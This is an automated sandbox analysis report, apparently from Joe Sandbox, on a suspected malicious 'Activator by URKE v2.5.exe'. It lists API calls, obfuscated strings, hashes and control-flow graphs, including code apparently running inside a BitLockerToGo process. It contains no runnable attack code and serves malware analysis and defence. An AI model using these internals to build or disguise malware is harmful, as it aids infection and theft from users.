                                                                                                                                                                                                                                                  • Instruction ID: 6776fa7ac3e81a8461088fd7319fa86789829c503b3f49cfae4653827cdb7cb9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B81A1AAE1961A85F720BF6584607FDA6A4BB44F98FC04137CD0ED3799CE3CA445C322
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3659116390-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 190572456-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3621893840-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __except_validate_context_recordabort
                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                  • API String ID: 746414643-3733052814
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: $*
                                                                                                                                                                                                                                                  • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 2466640111-1018135373
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                                  • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ObjectRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1429681911-3916222277
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CapsDeviceRelease
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 127614599-3916222277
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FoldString_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2025052027-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1077098981-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4141327611-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7E5F1F93B), ref: 00007FF7E5F24021
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7E5F1F93B), ref: 00007FF7E5F24083
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7E5F1F93B), ref: 00007FF7E5F240BD
                                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7E5F1F93B), ref: 00007FF7E5F240E7
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1557788787-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7E5F1B380,?,?,00000050,00007FF7E5F1D3C1), ref: 00007FF7E5F2095A
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF7E5F1B380,?,?,00000050,00007FF7E5F1D3C1), ref: 00007FF7E5F209C2
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF7E5F1B380,?,?,00000050,00007FF7E5F1D3C1), ref: 00007FF7E5F209D8
                                                                                                                                                                                                                                                  • abort.LIBCMT ref: 00007FF7E5F209DE
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1447195878-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1035833867-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                                                                                                                                  • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                                                                                                                                                                  • String ID: SIZE
                                                                                                                                                                                                                                                  • API String ID: 449872665-3243624926
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                  • API String ID: 3307058713-1199501487
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                                                                                                                                                                                  • String ID: $%s$@%s
                                                                                                                                                                                                                                                  • API String ID: 2650857296-834177443
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DialogParamVisibleWindow
                                                                                                                                                                                                                                                  • String ID: GETPASSWORD1
                                                                                                                                                                                                                                                  • API String ID: 3157717868-3292211884
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E5F157EE), ref: 00007FF7E5F1788C
                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E5F157EE), ref: 00007FF7E5F178D2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FindHandleModuleResource
                                                                                                                                                                                                                                                  • String ID: RTL
                                                                                                                                                                                                                                                  • API String ID: 3537982541-834975271
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w, xrefs: 0075A05D
                                                                                                                                                                                                                                                  • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexreflect.MakeChan: unidirectional ch, xrefs: 0075A029
                                                                                                                                                                                                                                                  • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Method index out of rangereflect: ChanDir of no, xrefs: 0075A002
                                                                                                                                                                                                                                                  • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: Bits of non-arithmetic Type r, xrefs: 0075A0B8
                                                                                                                                                                                                                                                  • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125 has no name has no typereflect., xrefs: 00759FA7
                                                                                                                                                                                                                                                  • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me, xrefs: 0075A084
                                                                                                                                                                                                                                                  • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 00759FCE
                                                                                                                                                                                                                                                  • %, xrefs: 0075A0C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2281043381.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_720000_n3.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • API String ID: 0-1595550274
                                                                                                                                                                                                                                                  • Opcode ID: 803a144c3a2fe9e2e89bccf082f9c3e7aa7b60cef5ad65b677a6301bf3a35fad
                                                                                                                                                                                                                                                  • Instruction ID: 83c7edbd2b351cf660ff9111c119cae8e623ccad82a0b8477155eefc4c150c52
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 803a144c3a2fe9e2e89bccf082f9c3e7aa7b60cef5ad65b677a6301bf3a35fad
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F991D4B4509705CFD304EF68D19975ABBF4BF88715F00892DE88887352D7B99948CB53

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:1.2%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:5.9%
                                                                                                                                                                                                                                                  Total number of Nodes:51
                                                                                                                                                                                                                                                  Total number of Limit Nodes:10

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 412 4474b0-4474e2 LdrInitializeThunk
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(0044AD9D,005C003F,00000006,?,?,00000018,C0C7C6C5,?,?), ref: 004474DE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 62 44675a-4467a6 63 4467a8 62->63 64 4467db-4467eb LoadLibraryExW 62->64 65 4467b0-4467d9 call 4472b0 63->65 66 446ee5-446f29 64->66 67 4467f1-44681a 64->67 65->64 67->66
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(Y?L1,00000000,00000800), ref: 004467E7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID: (O2A$<CBE$SGJ?$Y?L1$zKtM
                                                                                                                                                                                                                                                  • API String ID: 1029625771-3949311573
                                                                                                                                                                                                                                                  • Opcode ID: b05707db2f125eda5d1fdc215bd14d6b7d416d152ba3a0137072a56ae6d71b9f
                                                                                                                                                                                                                                                  • Instruction ID: 7006df5c9ba4c4eb951759edf0ff7b1ab7c3263103615ff2e5ba6ef147d772cb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b05707db2f125eda5d1fdc215bd14d6b7d416d152ba3a0137072a56ae6d71b9f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7214A7620C340AFD3448F29E890A1EBBF1AB86355F99982DF4A987352D734D845CB1A

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 137 40d240-40d24b call 445ec0 140 40d251-40d260 GetInputState call 43d4e0 137->140 141 40d43e-40d440 ExitProcess 137->141 144 40d266-40d296 GetCurrentThreadId GetCurrentProcessId 140->144 145 40d439 call 446f30 140->145 146 40d2c6-40d2ef 144->146 147 40d298 144->147 145->141 150 40d2f1 146->150 151 40d326-40d328 146->151 149 40d2a0-40d2c4 call 40d450 147->149 149->146 153 40d300-40d324 call 40d4d0 150->153 154 40d3d6-40d3f8 151->154 155 40d32e-40d344 151->155 153->151 157 40d426 call 40ed60 154->157 158 40d3fa 154->158 160 40d346 155->160 161 40d379-40d3a2 155->161 170 40d42b-40d42d 157->170 163 40d400-40d424 call 40d670 158->163 166 40d350-40d377 call 40d570 160->166 161->154 162 40d3a4 161->162 168 40d3b0-40d3d4 call 40d5f0 162->168 163->157 166->161 168->154 170->145 174 40d42f-40d434 call 411ef0 call 4101e0 170->174 174->145
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess$ExitInputStateThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029096631-0
                                                                                                                                                                                                                                                  • Opcode ID: c14ddecb69e59047660bcbd02f4c4e0bfc2371d56cc96fd310b6fed761d84219
                                                                                                                                                                                                                                                  • Instruction ID: cc5493a413f301da5963149821234f5dc2a0fb244e8c1f48303ea8f271895597
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c14ddecb69e59047660bcbd02f4c4e0bfc2371d56cc96fd310b6fed761d84219
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A341397480C340ABD701BBA9D544A1EFBE5AF52705F448D2EE5C4A7392D33AD818CB6B

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 383 446f50-446f64 384 446fd7-446fd8 call 444430 383->384 385 446fcc-446fcd call 4443b0 383->385 386 446f79-446f8e 383->386 387 446f6b-446f72 383->387 395 446fdd-446fe0 384->395 394 446fd2-446fd5 385->394 388 446fb6-446fca RtlReAllocateHeap 386->388 389 446f90-446fb4 call 447430 386->389 387->384 387->386 393 446fe2 388->393 389->388 397 446fe5-446fe7 393->397 394->397 395->393
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00446FC4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: e4651491361086169ccfcbd33c73f7565caaa82593336de2d4bfaf81bbccc4fd
                                                                                                                                                                                                                                                  • Instruction ID: b8336f78a23e17fb0fdc88f342f41f3c00e1d394e935a1e997b9b51d7c19cda6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4651491361086169ccfcbd33c73f7565caaa82593336de2d4bfaf81bbccc4fd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC01AD355182409BE301AF28F904A1EBBF4AF86B05F454C2DF8C487212D73AE8158BA7

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 398 444430-44443f 399 444446-444460 398->399 400 4444a9-4444ad 398->400 401 444496-4444a3 RtlFreeHeap 399->401 402 444462 399->402 401->400 403 444470-444494 call 4473a0 402->403 403->401
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 004444A3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3298025750-0

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 406 4443b0-4443d4 407 444406-444420 RtlAllocateHeap 406->407 408 4443d6 406->408 409 4443e0-444404 call 447330 408->409 409->407
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00444417
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00412356
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 004127AB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectorySystemUninitialize
                                                                                                                                                                                                                                                  • String ID: ?]1$47$4\$4`[b$4`[b$9($:;:9$@3I5$D$D'5%$H#Y!$M/_-$_^]\$f$o+X)$C"E$K*M
                                                                                                                                                                                                                                                  • API String ID: 1148197201-139556607
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: /O:A$4`[b$4`[b$89$8CBE$E3F5$W7JI$g?@1$m`he$7#v$EG
                                                                                                                                                                                                                                                  • API String ID: 0-1363345488
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeHeapInitializeThunk
                                                                                                                                                                                                                                                  • String ID: $%&'$()&'$()*+$,-./$,_9Q$0123$22.h$3W"i$7W2Q$8967$<=>?$PS$_^]\$gfed$srqp$|_"Y
                                                                                                                                                                                                                                                  • API String ID: 3158435063-286885100
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: .L6h$HP@^$W%Pb$lokz$zzcd$#v$@C
                                                                                                                                                                                                                                                  • API String ID: 0-755784068
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 2|$4`[b$JNWH$]IN^$ezx|$su$sw$xf$x{$|ltp$|}$~y
                                                                                                                                                                                                                                                  • API String ID: 0-2799980340
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: w1u$$W U$+[&Y$4`[b$4`[b$4`[b$=O?M$_^]\$c/g-$cS'Q
                                                                                                                                                                                                                                                  • API String ID: 0-1580076734
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
